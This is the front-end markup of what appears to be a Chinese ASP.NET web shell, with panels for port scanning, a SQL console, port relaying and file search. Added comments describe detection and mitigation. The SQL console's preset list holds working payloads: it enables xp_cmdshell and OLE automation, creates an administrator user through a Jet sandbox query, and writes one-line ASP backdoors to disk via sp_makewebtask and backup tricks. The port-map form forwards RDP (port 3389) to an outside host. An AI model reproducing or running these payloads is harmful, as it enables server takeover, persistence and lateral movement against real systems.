<asp:table id="plwd" runat="server" width="100%" cellspacing="0" >
<asp:tablerow cssclass="alt1"><asp:tablecell columnspan="2" id="vyx"></asp:tablecell></asp:tablerow>
<asp:tablerow cssclass="head"><asp:tablecell width="40%">key</asp:tablecell><asp:tablecell width="60%">value</asp:tablecell></asp:tablerow>
</asp:table>
</table>
</div>
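<%--portscan: form taking one address and a comma-separated port list, posted to the elkq handler
    (outside this section). Detection: bursts of short-lived connection attempts from the web worker
    process to loopback or internal addresses; a web server rarely needs to reach those ports.--%>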
<div id="ywlb" runat="server">
<p>
ip : <asp:textbox id="mdr" style="width:10%;margin:0 8px;" cssclass="input" runat="server" text="127.0.0.1"/> 端口 : <asp:textbox id="lomx" style="width:40%;margin:0 8px;" cssclass="input" runat="server" text="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"/> <asp:button id="cmuch" runat="server" text="扫描" cssclass="bt" onclick="elkq"/>
</p>
<div id="gbyt" runat="server" visible="false" enableviewstate="false"></div>
</div>
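<%--database: SQL console. The preset connection string uses the sa login with an empty password, and the
    preset statement list switches on xp_cmdshell, OLE automation, web assistant procedures and ad hoc
    distributed queries through sp_configure, and uses log/database backups to write script files to disk.
    Mitigation and detection: give web applications a least-privileged database login rather than sa,
    alert on sp_configure changes to these options, and alert on backups written to unexpected paths or
    with script extensions.--%>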
<div id="idgml" runat="server">
<p>语句 : <asp:textbox id="masr" style="width:70%;margin:0 8px;" cssclass="input" runat="server"/><asp:dropdownlist runat="server" cssclass="list" id="wymo" autopostback="true" onselectedindexchanged="zovo" ><asp:listitem></asp:listitem><asp:listitem value="server=localhost;uid=sa;pwd=;database=master;provider=sqloledb">mssql</asp:listitem><asp:listitem value="provider=microsoft.jet.oledb.4.0;data source=e:\database.mdb">access</asp:listitem></asp:dropdownlist><asp:button id="qczpa" runat="server" text="go" cssclass="bt" onclick="bgy"/></p>
<div id="dqiif" runat="server">
<div id="irtu" runat="server"></div>
<div id="uxevn" runat="server">
please select a database : <asp:dropdownlist runat="server" id="pvf" autopostback="true" onselectedindexchanged="zovo" cssclass="list"></asp:dropdownlist>
sqlexec : <asp:dropdownlist runat="server" id="fgey" autopostback="true" onselectedindexchanged="zovo" cssclass="list"><asp:listitem value="">-- sql server exec --</asp:listitem><asp:listitem value="use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')">add xp_cmdshell</asp:listitem><asp:listitem value="use master dbcc addextendedproc('sp_oacreate','odsole70.dll')">add sp_oacreate</asp:listitem><asp:listitem value="exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;">add xp_cmdshell(sql2005)</asp:listitem><asp:listitem value="exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;">add sp_oacreate(sql2005)</asp:listitem><asp:listitem value="exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'web assistant procedures',1;reconfigure;">add makewebtask(sql2005)</asp:listitem><asp:listitem value="exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ad hoc distributed queries',1;reconfigure;">add openrowset/opendatasource(sql2005)</asp:listitem><asp:listitem value="exec master.dbo.xp_cmdshell 'net user'">xp_cmdshell exec</asp:listitem><asp:listitem value="exec master..xp_dirtree 'c:\',1,1">xp_dirtree</asp:listitem><asp:listitem value="declare @s int;exec sp_oacreate 'wscript.shell',@s out;exec sp_oamethod @s,'run',null,'cmd.exe /c echo ^<%execute(request(char(35)))%^>>c:\bin.asp';">sp_oamethod exec</asp:listitem><asp:listitem value="sp_makewebtask @outputfile='c:\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>'''">sp_makewebtask make file</asp:listitem><asp:listitem value="exec master..xp_regwrite 'hkey_local_machine','software\microsoft\jet\4.0\engines','sandboxmode','reg_dword',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user root root/add ")')">sandbox</asp:listitem><asp:listitem value="create table 
[bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696e backup log @a to disk=@s;insert into [bin_cmd](cmd)values('<%execute(request(chr(35)))%>');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];">logbackup</asp:listitem><asp:listitem value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696e backup database @a to disk=@s;insert into [bin_cmd](cmd)values('<%execute(request(chr(35)))%>');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='c:\bin.asp' backup database @b to disk=@t with differential,format;drop table [bin_cmd];">databasebackup</asp:listitem></asp:dropdownlist>
</div>
<table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td> run sql </td></tr><tr><td><textarea id="jhiy" class="area" style="width:600px;height:60px;overflow:auto;" runat="server" rows="6" cols="1"></textarea></td></tr><tr><td>
<asp:button runat="server" id="wohj" cssclass="bt" text="query" onclick="orugv"/></td></tr></table>
<div style="overflow-x:auto;width:950px" >
<p>
<asp:datagrid runat="server" id="rom" headerstyle-cssclass="head" borderwidth="0" gridlines="none" ></asp:datagrid>
</p>
</div>
</div>
</div>
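<%--portmap: form pairing a local address and port (default 127.0.0.1:3389) with a remote host and port
    (default port 80); the map / clear / refresh handlers are outside this section. Detection: outbound
    connections opened by the web worker process, and non-HTTP traffic on port 80; egress filtering on
    web servers limits this kind of relay.--%>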
<div id="howtm" runat="server">
<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
<tr align="center">
<td style="width:5%"></td>
<td style="width:20%" align="left">本地ip : <input class="input" runat="server" id="eepm" type="text" size="20" value="127.0.0.1"/></td>
<td style="width:20%" align="left">本地端口 : <input class="input" runat="server" id="ixdh" type="text" size="20" value="3389"/></td>
<td style="width:20%" align="left">远程ip : <input class="input" runat="server" id="llh" type="text" size="20" value="www.on-e.cn"/></td>
<td style="width:20%" align="left">远端口程 : <input class="input" runat="server" id="zhs" type="text" size="20" value="80"/></td></tr>
<tr align="center"><td colspan="5"><br/><asp:button id="fje" cssclass="bt" runat="server" text="映射端口" onclick="wdz"/> <asp:button id="gix" cssclass="bt" runat="server" text="清除所有" onclick="vjnse"/> <asp:button id="gfsm" cssclass="bt" runat="server" text="刷新" onclick="tyoz"/></td></tr></table></div>
<%--search--%>
<div id="yhv" runat="server">
<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
<tr align="center">
<td style="width:20%" align="left">关键词</td>
<td style="width:60%" align="left"><textarea id="iamkl" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
<td style="width:20%" align="left"><input type="checkbox" runat="server" id="raq" value="1"/> 使用正则表达式</td>
</tr>
<tr align="center">
<td style="width:20%" align="left">替换</td>
<td style="width:60%" align="left"><textarea id="qpe" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
<td style="width:20%" align="left"><input type="checkbox" runat="server" id="yzw"/> 替换</td>
</tr>
<tr align="center">
<td style="width:20%" align="left">搜索文件类型</td>
<td style="width:60%" align="left"><input type="text" runat="server" class="input" id="udlva" style="width:100%" value="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"/></td>
<td style="width:20%" align="left"><asp:dropdownlist runat="server" id="ven" autopostback="false" cssclass="list"><asp:listitem value="name">文件名称</asp:listitem><asp:listitem value="content" selected="true">文件内容</asp:listitem></asp:dropdownlist></td>
</tr>
<tr align="center">
<td style="width:20%" align="left">路径</td>
<td style="width:60%" align="left"><input type="text" class="input" id="nalj" runat="server" style="width:100%" /></td>
<td style="width:20%" align="left"><asp:button cssclass="bt" id="axy" runat="server" onclick="nby" text="开始" /></td>
</tr>
</table>
<br/>
<br/>
<asp:table id="ojiym" runat="server" width="100%" cellspacing="0" >
<asp:tablerow cssclass="head"><asp:tablecell width="60%">file path</asp:tablecell><asp:tablecell width="20%">last modified</asp:tablecell><asp:tablecell width="20%">size</asp:tablecell></asp:tablerow>
</asp:table>
</div>
</td></tr></table>
<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#003300;">copyright © 2009-2012 <a href="/" target="_blank">on-e.cn</a> all rights reserved.</div></div>
</form>
</body>
</html>